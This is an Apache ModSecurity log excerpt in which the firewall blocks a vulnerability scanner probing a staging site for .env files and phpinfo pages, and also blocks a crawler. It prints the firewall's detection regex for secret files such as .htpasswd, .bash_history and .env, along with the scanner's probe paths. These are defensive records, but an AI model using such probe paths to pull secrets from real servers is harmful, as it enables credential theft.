[Tue May 26 15:30:48.848354 2026] [security2:error] [pid 715645:tid 715893] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgMVQAAAHY"]
[Tue May 26 15:30:48.856385 2026] [security2:error] [pid 715645:tid 715892] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgMVwAAAHU"]
[Tue May 26 15:30:48.873459 2026] [security2:error] [pid 715645:tid 715719] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/admin/phpinfo.php"] [unique_id "ahVvUHVGgMGh8k213RgMZwAAZkk"]
[Tue May 26 15:30:48.885706 2026] [security2:error] [pid 715645:tid 715860] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgMWgAAAFU"]
[Tue May 26 15:30:48.888926 2026] [security2:error] [pid 715645:tid 715877] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgMXgAAZnw"]
[Tue May 26 15:30:48.890759 2026] [security2:error] [pid 715645:tid 715703] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/admin_phpinfo.php"] [unique_id "ahVvUHVGgMGh8k213RgMawAAZjk"]
[Tue May 26 15:30:48.901773 2026] [security2:error] [pid 715645:tid 715877] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgMXQAAZkY"]
[Tue May 26 15:30:48.902350 2026] [security2:error] [pid 715645:tid 715830] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgMXwAAADc"]
[Tue May 26 15:30:48.908157 2026] [security2:error] [pid 715645:tid 715877] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgMYAAAZl0"]
[Tue May 26 15:30:48.917777 2026] [security2:error] [pid 715645:tid 715877] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgMZQAAZk8"]
[Tue May 26 15:30:48.918114 2026] [security2:error] [pid 715645:tid 715877] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgMYwAAZhs"]
[Tue May 26 15:30:48.932119 2026] [security2:error] [pid 715645:tid 715877] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgMagAAZlo"]
[Tue May 26 15:30:48.935254 2026] [security2:error] [pid 715645:tid 715789] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgMaAAAAA4"]
[Tue May 26 15:30:48.942195 2026] [security2:error] [pid 715645:tid 715877] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgMaQAAZk0"]
[Tue May 26 15:30:48.981321 2026] [security2:error] [pid 715645:tid 715842] [client 85.208.96.209:44302] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/12/"] [unique_id "ahVvUHVGgMGh8k213RgMdQAAAEM"]
[Tue May 26 15:30:48.981428 2026] [security2:error] [pid 715645:tid 715842] [client 85.208.96.209:44302] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/12/"] [unique_id "ahVvUHVGgMGh8k213RgMdQAAAEM"]
[Tue May 26 15:30:48.992222 2026] [security2:error] [pid 715645:tid 715877] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUHVGgMGh8k213RgMcQAAZns"]
[Tue May 26 15:30:48.998179 2026] [security2:error] [pid 715645:tid 715713] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/api-backend/.env"] [unique_id "ahVvUHVGgMGh8k213RgMdgAAZkM"]
[Tue May 26 15:30:49.021355 2026] [security2:error] [pid 715645:tid 715720] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/api-node/.env"] [unique_id "ahVvUXVGgMGh8k213RgMdwAAZko"]
[Tue May 26 15:30:49.036160 2026] [security2:error] [pid 715645:tid 715721] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/api/.env"] [unique_id "ahVvUXVGgMGh8k213RgMewAAZks"]
[Tue May 26 15:30:49.138261 2026] [security2:error] [pid 715645:tid 715714] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/api/info.php"] [unique_id "ahVvUXVGgMGh8k213RgMjQAAZkQ"]
[Tue May 26 15:30:49.155432 2026] [security2:error] [pid 715645:tid 715701] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/administrator/.env"] [unique_id "ahVvUHVGgMGh8k213RgMbQAAZjc"]
[Tue May 26 15:30:49.295382 2026] [security2:error] [pid 715645:tid 715877] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgMgAAAZkI"]
[Tue May 26 15:30:49.296594 2026] [security2:error] [pid 715645:tid 715877] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgMgQAAZkw"]
[Tue May 26 15:30:49.298129 2026] [security2:error] [pid 715645:tid 715857] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgMfwAAAFI"]
[Tue May 26 15:30:49.305303 2026] [security2:error] [pid 715645:tid 715877] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgMhAAAZl4"]
[Tue May 26 15:30:49.310284 2026] [security2:error] [pid 715645:tid 715877] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgMggAAZno"]
[Tue May 26 15:30:49.315407 2026] [security2:error] [pid 715645:tid 715839] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgMfgAAAEA"]
[Tue May 26 15:30:49.324768 2026] [security2:error] [pid 715645:tid 715877] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgMgwAAZgM"]
[Tue May 26 15:30:49.329687 2026] [security2:error] [pid 715645:tid 715781] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgMkAAAAAY"]
[Tue May 26 15:30:49.331044 2026] [security2:error] [pid 715645:tid 715852] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgMigAAAE0"]
[Tue May 26 15:30:49.333720 2026] [security2:error] [pid 715645:tid 715877] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgMkQAAZgE"]
[Tue May 26 15:30:49.337590 2026] [security2:error] [pid 715645:tid 715877] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgMiwAAZnQ"]
[Tue May 26 15:30:49.342891 2026] [security2:error] [pid 715645:tid 715877] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgMhQAAZj0"]
[Tue May 26 15:30:49.351179 2026] [security2:error] [pid 715645:tid 715797] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgMjAAAABY"]
[Tue May 26 15:30:49.352711 2026] [security2:error] [pid 715645:tid 715877] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgMlQAAZj4"]
[Tue May 26 15:30:49.352914 2026] [security2:error] [pid 715645:tid 715877] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgMmAAAZhY"]
[Tue May 26 15:30:49.362674 2026] [security2:error] [pid 715645:tid 715877] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgMmgAAZn8"]
[Tue May 26 15:30:49.441333 2026] [security2:error] [pid 715645:tid 715654] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/api/phpinfo.php"] [unique_id "ahVvUXVGgMGh8k213RgMowAAXAg"]
[Tue May 26 15:30:49.489543 2026] [security2:error] [pid 715645:tid 715767] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/apis/.env"] [unique_id "ahVvUXVGgMGh8k213RgMvgAAHnk"]
[Tue May 26 15:30:49.501180 2026] [security2:error] [pid 715645:tid 715805] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgMpAAAHmk"]
[Tue May 26 15:30:49.503042 2026] [security2:error] [pid 715645:tid 715779] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgMqAAAAAQ"]
[Tue May 26 15:30:49.508195 2026] [security2:error] [pid 715645:tid 715838] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgMrAAAAD8"]
[Tue May 26 15:30:49.514248 2026] [security2:error] [pid 715645:tid 715787] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgMrgAAAAw"]
[Tue May 26 15:30:49.520977 2026] [security2:error] [pid 715645:tid 715783] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgMsgAAAAg"]
[Tue May 26 15:30:49.535659 2026] [security2:error] [pid 715645:tid 715795] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgMugAAABQ"]
[Tue May 26 15:30:49.544941 2026] [security2:error] [pid 715645:tid 715805] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgMwQAAHlw"]
[Tue May 26 15:30:49.553593 2026] [security2:error] [pid 715645:tid 715805] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgMwAAAHlI"]
[Tue May 26 15:30:49.563315 2026] [security2:error] [pid 715645:tid 715799] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgMxwAAABg"]
[Tue May 26 15:30:49.567788 2026] [security2:error] [pid 715645:tid 715900] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgMxQAAAH0"]
[Tue May 26 15:30:49.578562 2026] [security2:error] [pid 715645:tid 715825] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgMywAAADI"]
[Tue May 26 15:30:49.579766 2026] [security2:error] [pid 715645:tid 715858] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgMygAAAFM"]
[Tue May 26 15:30:49.581359 2026] [security2:error] [pid 715645:tid 715892] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgMyQAAAHU"]
[Tue May 26 15:30:49.594522 2026] [security2:error] [pid 715645:tid 715893] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgMyAAAAHY"]
[Tue May 26 15:30:49.636678 2026] [security2:error] [pid 715645:tid 715695] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/app/.env"] [unique_id "ahVvUXVGgMGh8k213RgM1QAAHjE"]
[Tue May 26 15:30:49.637917 2026] [security2:error] [pid 715645:tid 715803] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgM0QAAABw"]
[Tue May 26 15:30:49.702269 2026] [security2:error] [pid 715645:tid 715832] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgM2AAAADk"]
[Tue May 26 15:30:49.729870 2026] [security2:error] [pid 715645:tid 715857] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgM5QAAAFI"]
[Tue May 26 15:30:49.732857 2026] [security2:error] [pid 715645:tid 715864] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgM4gAAAFk"]
[Tue May 26 15:30:49.736836 2026] [security2:error] [pid 715645:tid 715881] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgM4wAAAGo"]
[Tue May 26 15:30:49.738125 2026] [security2:error] [pid 715645:tid 715835] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgM6AAAADw"]
[Tue May 26 15:30:49.741935 2026] [security2:error] [pid 715645:tid 715831] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgM5AAAADg"]
[Tue May 26 15:30:49.751860 2026] [security2:error] [pid 715645:tid 715844] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgM7QAAAEU"]
[Tue May 26 15:30:49.766551 2026] [security2:error] [pid 715645:tid 715827] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgM7AAAADQ"]
[Tue May 26 15:30:49.774485 2026] [security2:error] [pid 715645:tid 715839] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUXVGgMGh8k213RgM8QAAAEA"]
